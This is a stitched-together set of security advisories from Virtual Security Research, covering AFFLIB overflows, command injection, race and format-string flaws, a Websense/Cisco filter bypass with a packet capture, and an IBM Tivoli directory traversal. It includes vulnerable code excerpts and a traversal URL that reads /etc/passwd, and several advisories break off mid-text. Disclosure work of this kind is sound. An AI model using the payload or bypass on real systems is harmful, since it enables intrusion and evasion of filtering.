A potentially untrustworthy parameter is used without length checking in
a strcpy() call which writes to a stack-based buffer. If this command
receives parameters from an untrusted source, code execution would be a
major risk. Lines 59-70 are included to illustrate the problem:
static int ewf_open(AFFILE *af)
{
if(strchr(af-fname,'.')==0) return -1; // need a '.' in the filename
/* See how many files there are to open */
char **files = (char **)malloc(sizeof(char *));
int nfiles = 1;
files[0] = strdup(af-fname);
char fname[MAXPATHLEN+1];
strcpy(fname,af-fname);
An overflow could occur because the af-fname string is provided by the
user, and is not limited to MAXPATHLEN. An attacker could use this in
scenarios where a 3rd-party program incorporates AFFLIB(TM) into their
program (which ultimately accepts file names from an untrusted source)
or in situations where an AFFLIB(TM) binary is setuid/setgid or is
executed remotely web applications.
* Stack-based Buffer Overflow in AFD Vnode Wrapper *
File: lib/vnode_afd.cpp
Line: 405
Description:
A potentially untrustworthy parameter is used without length checking in
a strcpy() call which writes to a stack-based buffer. If this command
receives parameters from an untrusted source, code execution would be a
major risk. Lines 402-412 are included below for illustration:
while ((dp = readdir(dirp)) != NULL){
if (last4_is_aff(dp-d_name)){
char path[MAXPATHLEN+1];
strcpy(path,af-fname);
strlcat(path,/,sizeof(path));
strlcat(path,dp-d_name,sizeof(path));
if(afd_add_file(af,path)){
return -1;
}
}
}
The overflow would occur if a value for af-fname were specified by a
user which was larger than 1025 bytes. This is certainly plausible,
since many systems allow pathnames to be as large as 4096 bytes. As
this is part of the core AFFLIB(TM), it could be exploited in 3rd party
programs which include AFFLIB(TM) support, if an attacker were allowed
to specify filenames. In addition, it could be exploited if any
AFFLIB(TM) binary were setuid/setgid, or if these programs were executed
from a CGI script or similar remote connection.
* Stack-based Buffer Overflow in aimage Input File Name *
File: aimage/aimage.cpp
Line: 554
Description:
A command line parameter is used without length checking in a sprintf()
call, which writes to a stack-based buffer. If this command (or this
function) receives parameters from an untrusted source, code execution
would be a major risk. Lines 548-554 are included for illustration:
int getlock(class imager *im)
{
/* If the file exists and the PID in the file is running,
* can't get the lock.
*/
char lockfile[MAXPATHLEN];
sprintf(lockfile,/tmp/aimge.%s.lock,im-infile);
An attacker could exploit this problem if the aimage binary were
setuid/setgid, or if the aimage program were executed in a CGI script or
something similar.
Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:
2007-04-01 - Vendor provided details of all vulnerabilities
identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple
security fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
fixed in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not
notify VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected
version 2.2.8 and found that no additional vulnerabilities
were fixed. VSR advisories published.
Recommendation:
AFFLIB(TM) users should upgrade to the newest version. Third-party
projects which rely on AFFLIB(TM) should encourage users to upgrade,
and/or incorporate fixes into their distribution of the library.
The update is available via:
http://www.afflib.org/downloads/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Common Vulnerabilities and Exposures (CVE) Information:
The Common
AFFLIB(TM): Multiple Shell Metacharacter Injections
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Multiple Shell Metacharacter Injections in AFFLIB
Release Date: 2007-04-27
Application: AFFLIB(TM)
Versions: 2.2.0-2.2.8 and likely earlier versions
Severity: Medium to Low
Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2055
Reference:
http://www.vsecurity.com/bulletins/advisories/2007/afflib-shellinject.txt
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description:
From the forensicswiki.org website[1]:
The Advanced Forensics Format (AFF) is an extensible open format for
the storage of disk images and related forensic metadata. It was
developed by Simson Garfinkel and Basis Technology.
AFFLIB(TM) is the reference implementation of the AFF(TM) format,
written primarily by Simson Garfinkel. It comes in the form of an open
source library and a set of command line tools used to manipulate
AFF(TM) files.
Vulnerability Overview:
In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool
assessment process. As a result, multiple vulnerabilities of varying
severities were discovered. The most significant of these
vulnerabilities are being announced publicly to raise awareness and help
end-users secure themselves against potential attack.
VSR found that user-supplied command line parameters were used in
several popen() calls without validation or escaping. The attack
vectors available are limited, which reduces the overall severity of
these problems.
These vulnerabilities remain exploitable in the latest release (2.2.8),
even though an attempt was made to check for a set of shell
metacharacters. All line numbers listed below are from version 2.2.0.
Vulnerability Details:
The following sections include detailed descriptions of the specific
instances of shell metacharacter injection found during the assessment.
* Shell Command Injections in Decompression Calls *
File: tools/afconvert.cpp
Lines: 245 255
Platforms Affected: Unix
Description:
A command line parameter is used without validation or escaping in a
popen() call. If this command (or this function) receives parameters
from an untrusted source, code execution would be a major risk. Lines
240-257 are included below for illustration:
/* Check to see if it is a gzip file... */
if(probe_gzip(infile)
yesno(infile looks like a gzip file,Uncompress
it,Uncompressing)){
/* Open with a subprocess. We will need to use zlib when we move to
Windows. */
char buf[256];
sprintf(buf,gzcat %s,infile);
a_in = af_popen(buf,r);
}
/* Check to see if it is a bzip2 file... */
if(!a_in
probe_bzip2(infile)
yesno(infile looks like a bzip2 file,Uncompress
it,Uncompressing)){
/* Open with a subprocess. We will need to use bzip2zlib when we move to
Windows. */
char buf[256];
sprintf(buf,bzcat %s,infile);
a_in = af_popen(buf,r);
}
char buf[256];
sprintf(buf,gzcat %s,infile);
a_in = af_popen(buf,r);
Since af_popen() ultimately uses the popen() system call, and infile
comes directly from a command line parameter, command line special
characters could be injected if an attacker could control the input.
* Shell Command Injection in Unused get_parameter Function *
File: aimage/ident.cpp
Line: 190
Platforms Affected: Unix
Description:
A function parameter is used without validation or escaping in a popen()
call. If this function (get_parameter) received arguments from an
untrusted source, code execution would be a major risk. This function
does not appear to be called at this time.
Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:
2007-04-01 - Vendor provided details of all vulnerabilities
identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple
security fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
fixed in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not
notify VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected
version 2.2.8 and found that no additional vulnerabilities
were fixed. VSR advisories published
AFFLIB(TM): Time-of-Check-Time-of-Use File Race
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Time-of-Check-Time-of-Use File Race in AFFLIB
Release Date: 2007-04-27
Application: AFFLIB(TM)
Versions: 2.2.0-2.2.8 and likely earlier versions.
Severity: Low
Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com
Vendor Status: Vendor Notified
CVE Candidate: CVE-2007-2056
Reference:
http://www.vsecurity.com/bulletins/advisories/2007/afflib-toctou.txt
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product Description:
From the forensicswiki.org website[1]:
The Advanced Forensics Format (AFF) is an extensible open format for
the storage of disk images and related forensic metadata. It was
developed by Simson Garfinkel and Basis Technology.
AFFLIB(TM) is the reference implementation of the AFF(TM) format,
written primarily by Simson Garfinkel. It comes in the form of an open
source library and a set of command line tools used to manipulate
AFF(TM) files.
Vulnerability Overview:
In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a
security code review of AFFLIB(TM) as a part of an internal tool
assessment process. As a result, multiple vulnerabilities of varying
severities were discovered. The most significant of these
vulnerabilities are being announced publicly to raise awareness and help
end-users secure themselves against potential attack.
A time-of-check-time-of-use race was discovered in AFFLIB(TM) which
could allow an attacker on the local machine to overwrite an arbitrary
file. Because the content of the file would not be controllable by an
attacker, it is unlikely that this is vulnerability is exploitable for
more than a denial-of-service.
This vulnerability remains in the latest version (2.2.8) despite several
notifications to the vendor. All line numbers listed below are from
version 2.2.0.
Vulnerability Details:
File: aimage/aimage.cpp
Lines: 554-575
Platforms Affected: Unix
Description:
A mostly predictable name for the lockfile as it is created under
/tmp. An access check is first performed, and later the file is opened,
truncating if it already exists. Since the time of check and time of use
are not the same, a filesystem race could be exploited by a local
attacker through the use of a symlink. Lines 548-582 are included below
to illustrate the problem:
int getlock(class imager *im)
{
/* If the file exists and the PID in the file is running,
* can't get the lock.
*/
char lockfile[MAXPATHLEN];
sprintf(lockfile,/tmp/aimge.%s.lock,im-infile);
if(access(lockfile,F_OK)==0){
/* Lockfile exists. Get it's pid */
char buf[1024];
FILE *f = fopen(lockfile,r);
if(!f){
perror(lockfile); // can't read lockfile...
return -1;
}
fgets(buf,sizeof(buf),f);
buf[sizeof(buf)-1] = 0;
int pid = atoi(buf);
if(checkpid(pid)==0){
/* PID is not running; we can delete the lockfile */
if(unlink(lockfile)){
err(1,could not delete lockfile %s: ,lockfile);
}
}
/* PID is running; generate error */
errx(1,%s is locked by process
%d\n,im-infile,pid);
}
FILE *f = fopen(lockfile,w);
if(!f){
err(1,lockfile);
}
fprintf(f,%d\n,getpid()); // save our PID.
fclose(f);
return 0;
}
This is likely only exploitable for a denial-of-service condition, since
the attacker would have little control over the content being written
(the process ID of aimage).
Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:
2007-04-01 - Vendor provided details of all vulnerabilities
identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple
security fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
fixed in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not
notify VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected
version 2.2.8 and found that no additional vulnerabilities
were fixed. VSR advisories published.
Recommendation:
AFFLIB(TM) users should upgrade to the newest version. Third-party
AFFLIB(TM): Multiple Format String Injections
){
/* PID is not running; we can delete the lockfile */
if(unlink(lockfile)){
err(1,could not delete lockfile %s: ,lockfile);
}
}
/* PID is running; generate error */
errx(1,%s is locked by process
%d\n,im-infile,pid);
}
FILE *f = fopen(lockfile,w);
if(!f){
err(1,lockfile);
Since the im-infile value could be specified by a user, the lockfile
string could contain format string characters. An attacker could
exploit this problem if the aimage binary were setuid/setgid, or if the
aimage program were executed in a CGI script or something similar.
* Format String Injection in imager *
File: aimage/imager.cpp
Line: 265
Description:
A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.
* Format String Injection in afxml *
File: tools/afxml.cpp
Line: 101
Description:
A command line parameter is used as the format string in the err()
call. If an attacker could control this name, a format string injection
vulnerability could be exploited.
Vendor Response:
Simson Garfinkel was first contacted on 2007-03-31. The following
timeline outlines the responses from the vendor regarding this issue:
2007-04-01 - Vendor provided details of all vulnerabilities
identified.
2007-04-03 - Continued vendor communication.
2007-04-05 - Vendor released version 2.2.6, containing multiple
security fixes.
2007-04-06 - Vendor notified VSR that fixes were released.
2007-04-09 - VSR notified vendor that 9 vulnerability instances still
remained in latest release.
2007-04-12 - Vendor confirmed that remaining vulnerabilities would be
fixed in next release.
2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not
notify VSR.
2007-04-27 - VSR discovered new versions were released. VSR inspected
version 2.2.8 and found that no additional vulnerabilities
were fixed. VSR advisories published.
Recommendation:
AFFLIB(TM) users should upgrade to the newest version. Third-party
projects which rely on AFFLIB(TM) should encourage users to upgrade,
and/or incorporate fixes into their distribution of the library.
The update is available via:
http://www.afflib.org/downloads/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following name to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.
CVE-2007-2054
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. AFF - Forensics Wiki
http://www.forensicswiki.org/wiki/AFF
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This advisory is distributed for educational purposes only, and comes
with absolutely NO WARRANTY; not even the implied warranty of
merchantability or fitness for a particular purpose. Virtual Security
Research, LLC nor the author accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Vulnerability Disclosure Policy:
http://www.vsecurity.com/disclosurepolicy.html
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
AFF(TM) and AFFLIB(TM) are trademarks of Simson Garfinkel and Basis
Technology Corp.
Included source code excerpts are copyright Simson Garfinkel and Basis
Technology Corp.
This advisory is copyright (C) 2007 Virtual Security Research, LLC. All
rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFGMjSCQ1RSUNR+T+gRAtFVAJ4+d7NZBSefuHg1IoHtBb6RnPA2aACeJ6p3
SojDUxCo8X43cOE0XXZcxXo=
=W+7Y
-END PGP SIGNATURE-
VSR Advisory: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: WebSense content filter bypass when deployed in conjunction with Cisco filtering devices Release Date: 2006-05-08 Application: Websense in Conjunction with Cisco PIX Version: Websense 5.5.2 Cisco PIX OS / ASA 7.0.4.12 Cisco PIX OS 6.3.5(112) FWSM 2.3.x FWSM 3.x (other versions untested) Severity: Low Author: George D. Gal ggal_at_vsecurity.com Vendor Status: Vendor Notified, Fix Available CVE Candidate: CVE-2006-0515 Reference: http://www.vsecurity.com/bulletins/advisories/2006/cisco-websense-bypass.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the WebSense website[1]: Websense Enterprise, the industry-leading web filtering solution, improves employee productivity, reduces legal liability, and optimizes the use of IT resources. Websense Enterprise integrates seamlessly with leading network infrastructure products to offer unequaled flexibility and control. Vulnerability Overview: On August 9th, 2005 VSR has identified the ability to bypass the Websense URL filtering capabilities when used in conjunction with the Cisco PIX for web content filtering. Shortly thereafter another security researcher [sledge.hammer(a+t)sinhack.net] had published[2] a proof-of-concept for evading the URL filtering performed by Websense claiming that Websense has failed to address the issue. However, the vulnerability has been verified by Cisco as a problem which relies within its handling of filtered requests. Vulnerability Details: The vulnerability exists primarily due to the manner in which Cisco PIX and other Cisco filtering devices handle split packets in conjunction with Websense Enterprise integration. For each HTTP request the Cisco PIX or other Cisco device forwards individual packets to Websense to determine whether or not the request should be permitted. However, when splitting the HTTP request into two or more packets on the HTTP method it is possible to circumvent the filtering mechanism. Additionally, requests using this fragmented approach do not appear to be logged within Websense indicating that the request is never sent to Websense for policy inspection. The simplest form required to exploit this vulnerability is to fragment the first character of the HTTP request, followed by a single TCP packet for subsequent data (e.g. setting the PSH flag on the individual packets). Virtual Security Research has created a utility[3] to demonstrate the ability to bypass Websense filtering for the affected versions of Cisco filtering devices enumerated in this advisory header. You may download and run this utility at your own risk from: http://www.vsecurity.com/tools/WebsenseBypassProxy.java The following Snort output demonstrates the fragmented request capable of bypassing Websense: - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 11/04-10:06:36.260991 0:B:DB:DE:19:87 - 0:0:C:7:AC:5 type:0x800 len:0x43 10.254.5.113:58034 - 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1534 IpLen:20 DgmLen:53 DF ***AP*** Seq: 0xF5B80F51 Ack: 0x21D6E47 Win: 0x8040 TcpLen: 32 TCP Options (3) = NOP NOP TS: 148674 160066961 47 G =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/04-10:06:36.359288 0:30:7B:93:19:4C - 0:B:DB:DE:19:87 type:0x800 len:0x42 82.165.25.125:80 - 10.254.5.113:58034 TCP TTL:49 TOS:0x0 ID:36972 IpLen:20 DgmLen:52 DF ***A Seq: 0x21D6E47 Ack: 0xF5B80F52 Win: 0x16A0 TcpLen: 32 TCP Options (3) = NOP NOP TS: 160066973 148674 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/04-10:06:36.359387 0:B:DB:DE:19:87 - 0:0:C:7:AC:5 type:0x800 len:0x185 10.254.5.113:58034 - 82.165.25.125:80 TCP TTL:64 TOS:0x0 ID:1535 IpLen:20 DgmLen:375 DF ***AP*** Seq: 0xF5B80F52 Ack: 0x21D6E47 Win: 0x8040 TcpLen: 32 TCP Options (3) = NOP NOP TS: 148683 160066973 45 54 20 2F 66 61 76 69 63 6F 6E 2E 69 63 6F 20 ET /favicon.ico 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 HTTP/1.1..Host: 77 77 77 2E 70 68 72 61 63 6B 2E 6F 72 67 0D 0A www.phrack.org.. 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Agent: Mozi 6C 6C 61 2F 35 2E 30 20 28 58 31 31 3B 20 55 3B lla/5.0 (X11; U; 20 46 72 65 65 42 53 44 20 69 33 38 36 3B 20 65 FreeBSD i386; e 6E 2D 55 53 3B 20 72 76 3A 31 2E 37 2E 39 29 20 n-US; rv:1.7.9) 47 65 63 6B 6F 2F 32 30 30 35 30 37 31 38 20 46 Gecko/20050718 F 69 72 65 66 6F 78 2F 31 2E 30 2E 35 0D 0A 41 63 irefox/1.0.5..Ac 63 65 70 74 3A 20 69 6D 61 67 65 2F 70 6E 67 2C cept: image/png, 2A 2F 2A 3B 71 3D 30 2E
VSR Advisory: IBM Tivoli Access Manager - Web Server Plug-in File Retrieval Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Remote Directory Traversal and File Retrieval Release Date: 2006-02-03 Application: IBM Tivoli Access Manager Version: 5.1.0.10, 6.0.0 (other versions untested) Severity: High Author: Timothy D. Morgan [EMAIL PROTECTED] Vendor Status: Vendor Notified, Fix Available CVE Candidate: CVE-2006-0513 Reference: http://www.vsecurity.com/bulletins/advisories/2006/tam-file-retrieval.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From IBM's Website[1][2]: IBM Tivoli Access Manager for e-business is an award winning, policy-based access control solution for e-business and enterprise applications that is in the leader quadrant of Gartner's Magic Quadrant. Tivoli Access Manager for e-business can help you manage growth and complexity, control escalating management costs and address the difficulties of implementing security policies across a wide range of Web and application resources. Tivoli Access Manager Plug-in for Web Servers enforces a high degree of security in a secure domain by requiring each client to provide proof of identity. Comprehensive network security can be provided by having Tivoli Access Manager Plug-in for Web Servers control the authentication and authorization of clients. Vulnerability Overview: On December 1st, while conducting a penetration test of a TAM enabled web application, VSR identified a vulnerability in Tivoli Web Server Plug-in which is a component of Tivoli Access Manager (TAM). This flaw allows an authenticated attacker to retrieve files (which reside outside of the web root) from the web server on which the plug-in resides. It is possible to retrieve any file or list any directory which is readable by the web server software. Vulnerability Details: IBM's TAM Plug-in contains a logout handler under the root web path named `pkmslogout'. This handler is designed to log out authenticated users. The handler's display template can be specified by the `filename' request parameter. The value of this parameter is intended to be the partial path to a file on the web server which contains the page template. This file path is vulnerable to directory traversal, and can be used to retrieve nearly arbitrary files from the web server hosting the TAM Plug-in. For instance, if a vulnerable plug-in existed on the system tam.example.com, one could exploit the problem by hitting a URL such as: http://tam.example.com/pkmslogout?filename=../../../../../../../etc/passwd It appears this problem can only be triggered when the attacker is already authenticated through the Web Plug-in. Vendor Response: IBM was first notified on 2005-12-05. Initial response was received on 2005-12-06. A patch for this issue was released (For versions 5.1.0) on 2006-01-18 and was published as a Limited availability fix: 5.1.0-TIV-WPI-LA0016. A generally available fix pack for version 5.1.0 and 6.0 was released by the vendor on 2006-02-03 and available as: Fixpack 5.1.0-TIV-WPI-FP0017 is available at: http://www-1.ibm.com/support/docview.wss?uid=swg24011562 Fixpack 6.0.0-TIV-WPI-FP0001 is available at: http://www-1.ibm.com/support/docview.wss?uid=swg24011561 Recommendation: Apply the relevant fix packs available from IBM. - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CVE-2006-0513 - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- References: 1. IBM Tivoli Access Manager for e-business - Product overview http://www-306.ibm.com/software/tivoli/products/access-mgr-e-bus/ 2. IBM Tivoli Access Manager Plug-in for Web Servers Authentication http://publib.boulder.ibm.com/infocenter/tivihelp/v2r1/topic/com.ibm.itame2.doc_5.1/am51_webservers_guide26.htm - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings to: Hotsauce, Beans, and Cornbread - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Copyright 2006 Virtual Security Research, LLC. All rights reserved. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (Darwin) iD8DBQFD4+rATY6Rj3GeBOoRAi+eAJ43hbN4SCozKwEVi7q9UVWjtSTe+gCglrwN BjxuwG+YiPsBpIQfA0CYM6k= =GGKM -END PGP SIGNATURE-
